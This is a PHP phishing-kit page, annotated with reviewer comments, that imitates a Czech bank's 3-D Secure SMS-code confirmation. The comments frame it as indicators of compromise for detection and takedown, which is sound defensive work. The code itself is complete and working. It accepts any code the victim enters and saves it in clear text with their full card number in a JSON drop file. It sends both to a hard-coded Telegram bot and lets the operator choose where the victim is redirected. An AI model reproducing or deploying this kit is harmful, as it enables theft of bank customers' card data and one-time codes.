
<?php
// ---------------------------------------------------------------------------
// NOTE(review): this file is a credential-harvesting ("phishing kit") page that
// imitates a Czech bank 3-D Secure / SMS-OTP confirmation screen. Nothing here
// verifies an OTP against an issuer: any 4-8 byte value is accepted (see the
// POST handler below), stored next to the previously captured card number in
// a JSON file, and forwarded to a hard-coded Telegram chat. Treat the bot
// token, chat id, file names and page text as indicators of compromise for
// detection, hunting and takedown - not as application logic to maintain.
// The surrounding "Current Path / Upload File" banner and shell copyright
// trailer suggest this listing was recovered through a web shell on the host;
// confirm against the server's access logs.
// ---------------------------------------------------------------------------

// Start session to get payment session ID
session_start();
// Check if session ID exists
// The victim is expected to arrive from payment.html (not in view), which
// presumably sets payment_session_id after collecting card data; without it
// the page bounces back to the card form.
if (!isset($_SESSION['payment_session_id'])) {
    // Redirect to payment page if no session ID
    header('Location: payment.html');
    exit;
}

$sessionId = $_SESSION['payment_session_id'];

// Configuration file path
// Both paths are relative to the working directory. pending_cards.json is the
// kit's drop store for captured card numbers and OTPs; if `config/` is
// reachable over HTTP it is a second leak of victim data - check for that
// during incident response and secure/remove the file.
$config_dir = 'config';
$pending_cards_file = $config_dir . '/pending_cards.json';
$redirect_config_file = $config_dir . '/redirect_settings.json';

// Load existing redirect settings if file exists
// Defaults below; any key present in redirect_settings.json overrides them
// (array_merge with the loaded map last). These are operator-controlled, and
// $redirect_settings is not read anywhere else in this file's visible code.
$redirect_settings = [
    'success_url' => 'success.html',
    'failure_url' => 'failed.html',
    'default_destination' => 'https://www.example.com',
    'redirect_delay' => 2
];
if (file_exists($redirect_config_file)) {
    $config_content = file_get_contents($redirect_config_file);
    $loaded_settings = json_decode($config_content, true);
    if (is_array($loaded_settings)) {
        $redirect_settings = array_merge($redirect_settings, $loaded_settings);
    }
}

// Get card info for bank specific customization
// $bank_logo is never read, and this $bank_color is overwritten unconditionally
// in the styling section further down - both are dead assignments.
$bank_name = 'Česká spořitelna';
$bank_logo = 'images/cs-bank-logo.png';
$bank_color = '#0070F7';
$card_type = 'VISA';

if (file_exists($pending_cards_file)) {
    $pending_content = file_get_contents($pending_cards_file);
    // `?: []` turns a decode failure into an empty map, so a corrupt store is
    // silently treated as "no pending sessions".
    $pending_cards = json_decode($pending_content, true) ?: [];
    
    if (isset($pending_cards[$sessionId])) {
        // bank_name / card_type come from the store (written by an earlier
        // step, not in view) and drive the page's branding below.
        if (isset($pending_cards[$sessionId]['bank_name'])) {
            $bank_name = $pending_cards[$sessionId]['bank_name'];
        }
        
        if (isset($pending_cards[$sessionId]['card_type'])) {
            $card_type = $pending_cards[$sessionId]['card_type'];
        }
        
        // Update status to OTP verification
        // Rewritten on every request that renders this page (GET or POST) so an
        // operator panel (not in view) can see the victim reached the OTP step.
        // Read-modify-write with no LOCK_EX: concurrent requests can clobber
        // each other's updates to the shared store.
        $pending_cards[$sessionId]['status'] = 'otp_verification';
        file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
    }
}

// Handle OTP submission
$otp_error = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['otp'])) {
    // Raw POST value: not trimmed, not restricted to digits, only length-checked.
    $otp = $_POST['otp'];
    
    // Validate OTP (in this case, we accept any OTP)
    // strlen is byte-wise, so 4-8 *bytes* (not characters) pass. There is no
    // verification of any kind; the else-branch below only covers wrong length
    // and its Czech message ("The code is in the wrong format. Try again.")
    // keeps the victim retrying. If the length is fine but the session is not
    // in the store, nothing is recorded and the form is simply re-rendered.
    if (strlen($otp) >= 4 && strlen($otp) <= 8) {
        // Load pending cards
        // Re-read from disk instead of reusing the array loaded above.
        if (file_exists($pending_cards_file)) {
            $pending_content = file_get_contents($pending_cards_file);
            $pending_cards = json_decode($pending_content, true) ?: [];
            
            if (isset($pending_cards[$sessionId])) {
                // Update status and OTP
                // The OTP is persisted in clear text alongside the card record.
                $pending_cards[$sessionId]['status'] = 'otp_submitted';
                $pending_cards[$sessionId]['otp'] = $otp;
                $pending_cards[$sessionId]['otp_time'] = date('Y-m-d H:i:s');
                
                // Save updated pending cards
                file_put_contents($pending_cards_file, json_encode($pending_cards, JSON_PRETTY_PRINT));
                
                // Add Telegram notification code here
                // Send notification to Telegram
                // Exfiltration channel. The hard-coded bot token and chat id are
                // IoCs: they identify the operator's bot for blocking and for a
                // takedown request to Telegram. Do not reuse this code path.
                $TELEGRAM_BOT_TOKEN = '2147021455:AAECr25u-TTsb5_CZqvpUBrybQgqVyxtEUY';
                $CHAT_ID = '1328122846';
                
                // The message carries the OTP and the FULL stored card number;
                // masking only happens for the on-screen display further down.
                $message = "🔐 OTP Submitted:\n";
                $message .= "------------------------\n";
                $message .= "🔢 OTP: $otp\n";
                $message .= "💳 Card: " . $pending_cards[$sessionId]['card_number'] . "\n";
                $message .= "🏦 Bank: $bank_name\n";
                $message .= "🆔 Session ID: $sessionId\n";
                $message .= "⏰ Time: " . date('Y-m-d H:i:s') . "\n";
                
                // Outbound POST to api.telegram.org - a useful egress-filtering /
                // proxy-log pivot for finding other instances of the kit.
                $telegramApiUrl = "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage";
                $postData = [
                    'chat_id' => $CHAT_ID,
                    'text' => $message,
                    'parse_mode' => 'HTML'
                ];
                
                // Fire-and-forget: curl_exec's result is never checked, so a
                // failed delivery still sends the victim on to the waiting page.
                $ch = curl_init($telegramApiUrl);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_POST, true);
                curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
                curl_exec($ch);
                curl_close($ch);
                
                // Redirect to waiting page
                // otp_waiting.php is not in view; presumably it polls the
                // ?check=status endpoint below until the operator sets a redirect.
                header('Location: otp_waiting.php');
                exit;
            }
        }
    } else {
        $otp_error = 'Kód je v nesprávném formátu. Zkuste to znovu.';
    }
}
// Function to check if a redirect has been set for this session
/**
 * Look up whether the kit operator has flagged this session for redirection.
 *
 * Re-reads the pending-cards JSON store on every call. When the session's
 * status is exactly 'redirected' and a redirect_url is present, that URL is
 * returned verbatim; it is later handed to the browser by the ?check=status
 * endpoint, so whoever can write the store (the operator) chooses where the
 * victim is sent next - an open redirect by design, not a bug to fix.
 *
 * A missing file or malformed JSON (decoded via `?: []`) yields false, as does
 * any session that has not been marked 'redirected'.
 *
 * @param string $sessionId        key into the store (taken from $_SESSION)
 * @param string $pendingCardsFile path of pending_cards.json
 * @return string|false            the operator-supplied URL, or false
 */
function checkRedirectStatus($sessionId, $pendingCardsFile) {
    if (!file_exists($pendingCardsFile)) {
        return false;
    }
    
    $pendingContent = file_get_contents($pendingCardsFile);
    $pendingCards = json_decode($pendingContent, true) ?: [];
    
    // Strict equality on status; all four conditions must hold.
    if (isset($pendingCards[$sessionId]) && 
        isset($pendingCards[$sessionId]['status']) && 
        $pendingCards[$sessionId]['status'] === 'redirected' &&
        isset($pendingCards[$sessionId]['redirect_url'])) {
        
        return $pendingCards[$sessionId]['redirect_url'];
    }
    
    return false;
}

// Check if this is an AJAX request to check status
// Polling endpoint (GET ?check=status): answers with JSON and exits before any
// HTML is emitted. Only the PHP session gates it; the `url` it returns comes
// straight from the operator-writable store via checkRedirectStatus(). This
// page itself contains no script that calls it, so the caller is presumably
// otp_waiting.php (not in view).
if (isset($_GET['check']) && $_GET['check'] === 'status') {
    $redirectStatus = checkRedirectStatus($sessionId, $pending_cards_file);
    
    header('Content-Type: application/json');
    if ($redirectStatus) {
        echo json_encode(['redirect' => true, 'url' => $redirectStatus]);
    } else {
        echo json_encode(['redirect' => false]);
    }
    exit;
}

// Choose bank-specific styling
// Lookup table keyed by the exact bank_name string stored in pending_cards.json.
// The set of impersonated institutions is itself an IoC for defenders.
$bank_styles = [
    'Česká spořitelna' => [
        'color' => '#0070F7',
        'logo' => 'images/cs-bank-logo.png',
    ],
    'Komerční banka' => [
        'color' => '#0066B0',
        'logo' => 'images/kb-bank-logo.png',
    ],
    'ČSOB' => [
        'color' => '#0097A9',
        'logo' => 'images/csob-bank-logo.png',
    ],
    'Raiffeisenbank' => [
        'color' => '#FEEE00',
        'textColor' => '#000',
        'logo' => 'images/rb-bank-logo.png',
    ],
    'Moneta' => [
        'color' => '#95C11F',
        'logo' => 'images/moneta-bank-logo.png',
    ],
    // Add more banks as needed
];

// Default styling
// Unknown bank names fall back to these. $bank_color / $bank_text_color are
// interpolated unescaped into the <style> block below, but their only sources
// are this table and these literals, not request input.
$bank_color = '#0070F7';
$bank_text_color = '#FFF';
$bank_logo_url = 'images/bank-logo.png';

// Apply bank-specific styling if available
// $bank_logo_url is computed but never used: the markup below hard-codes a
// ČSOB logo regardless of $bank_name.
if (isset($bank_styles[$bank_name])) {
    $bank_color = $bank_styles[$bank_name]['color'];
    $bank_logo_url = $bank_styles[$bank_name]['logo'];
    if (isset($bank_styles[$bank_name]['textColor'])) {
        $bank_text_color = $bank_styles[$bank_name]['textColor'];
    }
}

// Get masked card number
// The store holds the full PAN (see the Telegram message above); this only
// masks it for display: first 6 and last 4 digits are shown, e.g.
// "1234 56XX XXXX 7890" for a 16-digit number. Non-digits are stripped first.
// $pending_cards may be undefined when the store file does not exist; isset()
// tolerates that and the all-X placeholder is shown.
$masked_card = 'XXXXXXXXXXXXXXXX';
if (isset($pending_cards[$sessionId]['card_number'])) {
    $card_number = $pending_cards[$sessionId]['card_number'];
    $card_number = preg_replace('/\D/', '', $card_number);
    $masked_card = substr($card_number, 0, 4) . ' ' . substr($card_number, 4, 2) . 'XX XXXX ' . substr($card_number, -4);
}
?>
<!DOCTYPE html>
<html lang="cs">
<!-- NOTE(review): lure markup for a fake 3-D Secure SMS-code prompt. The
     merchant, amount and bank logo are static, the countdown is purely
     cosmetic, and the form posts back to this script which accepts any code.
     Useful as a visual/text signature when hunting for copies of this kit. -->
<head>
    <meta charset="UTF-8">
    <!-- Favicon reused for all sizes; file name does not match any bank asset. -->
    <link rel="icon" type="image/png" sizes="16x16" href="images/downloadavatar.png">
    <link rel="icon" type="image/png" sizes="32x32" href="images/downloadavatar.png">
    <link rel="apple-touch-icon" sizes="180x180" href="images/downloadavatar.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <!-- Title: "Security verification - <bank>"; bank_name is HTML-escaped here. -->
    <title>Bezpečnostní ověření - <?php echo htmlspecialchars($bank_name); ?></title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
            margin: 0;
            padding: 20px;
            box-sizing: border-box;
        }
        .otp-container {
            background-color: white;
            border-radius: 8px;
            box-shadow: 0 4px 6px rgba(0,0,0,0.1);
            width: 100%;
            max-width: 400px;
            overflow: hidden;
        }
        /* Brand colours come from the PHP $bank_styles table (not from request
           input) and are echoed unescaped into the CSS below. */
        .bank-header {
            background-color: <?php echo $bank_color; ?>;
            color: <?php echo $bank_text_color; ?>;
            padding: 15px;
            display: flex;
            justify-content: space-between;
            align-items: center;
        }
        .bank-logo {
            height: 30px;
        }
        .card-brand {
            height: 24px;
        }
        .otp-content {
            padding: 20px;
        }
        h1 {
            font-size: 1.5em;
            margin-top: 0;
            margin-bottom: 15px;
            color: #333;
        }
        .otp-details {
            margin-bottom: 20px;
        }
        .detail-row {
            display: flex;
            justify-content: space-between;
            margin-bottom: 8px;
            font-size: 0.9em;
        }
        .detail-label {
            color: #666;
        }
        .detail-value {
            font-weight: bold;
            color: #333;
        }
        .otp-form {
            margin-top: 25px;
        }
        .otp-input-group {
            margin-bottom: 15px;
        }
        .otp-input-group label {
            display: block;
            margin-bottom: 5px;
            color: #333;
            font-weight: bold;
        }
        .otp-input {
            width: 100%;
            padding: 12px;
            border: 1px solid #ddd;
            border-radius: 4px;
            font-size: 1.2em;
            text-align: center;
            letter-spacing: 2px;
            box-sizing: border-box;
        }
        .otp-submit {
            width: 100%;
            padding: 12px;
            background-color: <?php echo $bank_color; ?>;
            color: <?php echo $bank_text_color; ?>;
            border: none;
            border-radius: 4px;
            font-size: 1em;
            font-weight: bold;
            cursor: pointer;
            transition: opacity 0.3s ease;
        }
        .otp-submit:hover {
            opacity: 0.9;
        }
        .otp-error {
            color: #e74c3c;
            margin-top: 10px;
            font-size: 0.9em;
        }
        .timer {
            text-align: center;
            font-size: 1.2em;
            font-weight: bold;
            color: <?php echo $bank_color; ?>;
            margin: 15px 0;
        }
        .timer-progress {
            width: 100%;
            height: 6px;
            background-color: #eee;
            border-radius: 3px;
            overflow: hidden;
            margin-top: 5px;
        }
        .timer-bar {
            height: 100%;
            background-color: <?php echo $bank_color; ?>;
            width: 100%;
            transition: width 1s linear;
        }
        .otp-notes {
            margin-top: 25px;
            padding-top: 15px;
            border-top: 1px solid #eee;
            font-size: 0.8em;
            color: #777;
        }
    </style>
</head>
<body>
    <div class="otp-container">
        <div class="bank-header">
            <!-- Logo is hard-coded to ČSOB regardless of $bank_name; the
                 per-bank $bank_logo_url computed in PHP is never used here. -->
            <img src="image/csobcz.svg" alt="ČSOB" class="bank-logo">
            <img src="image/vm.png" alt="<?php echo htmlspecialchars($card_type); ?>" class="card-brand">
        </div>
        
        <div class="otp-content">
            <!-- "Confirm the request" -->
            <h1>Potvrďte požadavek</h1>
            
            <!-- Merchant ("O2 Czech Republic") and amount (10,99 Kč) are fixed
                 strings; only the masked card number and the timestamp vary. -->
            <div class="otp-details">
                <div class="detail-row">
                    <span class="detail-label">Obchodník</span>
                    <span class="detail-value">O2 Czech Republic</span>
                </div>
                <div class="detail-row">
                    <span class="detail-label">Číslo karty</span>
                    <span class="detail-value"><?php echo htmlspecialchars($masked_card); ?></span>
                </div>
                <div class="detail-row">
                    <span class="detail-label">Částka</span>
                    <span class="detail-value">10,99 Kč</span>
                </div>
                <div class="detail-row">
                    <span class="detail-label">Čas požadavku</span>
                    <span class="detail-value"><?php echo date('d.m.Y H:i'); ?></span>
                </div>
            </div>
            
            <!-- Countdown is client-side decoration only (see script below);
                 the server enforces no expiry on submissions. -->
            <div class="timer">
                <div id="countdown">9:38</div>
                <div class="timer-progress">
                    <div class="timer-bar" id="timerBar"></div>
                </div>
            </div>
            
            <?php if (!empty($otp_error)): ?>
            <div class="otp-error">
                <?php echo htmlspecialchars($otp_error); ?>
            </div>
            <?php endif; ?>
            
            <!-- Posts `otp` back to this same script; no anti-CSRF token, no
                 client-side numeric validation beyond maxlength. -->
            <form class="otp-form" method="post" action="">
                <div class="otp-input-group">
                    <!-- "Enter the code from the SMS" -->
                    <label for="otp">Zadejte kód z SMS</label>
                    <input type="text" id="otp" name="otp" class="otp-input" placeholder="••••••" autocomplete="off" inputmode="numeric" maxlength="8" required>
                </div>
                
                <!-- "Confirm" -->
                <button type="submit" class="otp-submit">Potvrdit</button>
            </form>
            
            <!-- Reassurance copy: "enter the verification code sent by SMS; the
                 code's validity is time-limited" / "your online payments are
                 safe with 3D Secure". -->
            <div class="otp-notes">
                <p>Zadejte ověřovací kód, který Vám byl zaslán jako SMS na Váš telefon. Platnost kódu je časově omezena.</p>
                <p>Vaše online platby jsou s 3D Secure v bezpečí.</p>
            </div>
        </div>
    </div>
    
    <script>
        // Countdown timer functionality
        // Purely visual: counts 600 s down from a display that initially reads
        // "9:38", shrinks the bar, and does nothing when it reaches zero. No
        // request is made and the form stays submittable.
        document.addEventListener('DOMContentLoaded', function() {
            // Set timer for 10 minutes (600 seconds)
            let totalTime = 600;
            let timeLeft = totalTime;
            const countdownElement = document.getElementById('countdown');
            const timerBar = document.getElementById('timerBar');
            
            // Update timer every second
            const timerInterval = setInterval(function() {
                timeLeft--;
                
                // Calculate minutes and seconds left
                const minutes = Math.floor(timeLeft / 60);
                const seconds = timeLeft % 60;
                
                // Format time display
                countdownElement.textContent = `${minutes}:${seconds < 10 ? '0' : ''}${seconds}`;
                
                // Update progress bar
                const percentLeft = (timeLeft / totalTime) * 100;
                timerBar.style.width = `${percentLeft}%`;
                
                // If time's up, clear interval
                if (timeLeft <= 0) {
                    clearInterval(timerInterval);
                    countdownElement.textContent = '0:00';
                    timerBar.style.width = '0%';
                    // Could redirect to a timeout page here
                }
            }, 1000);
        });
    </script>
</body>
</html>
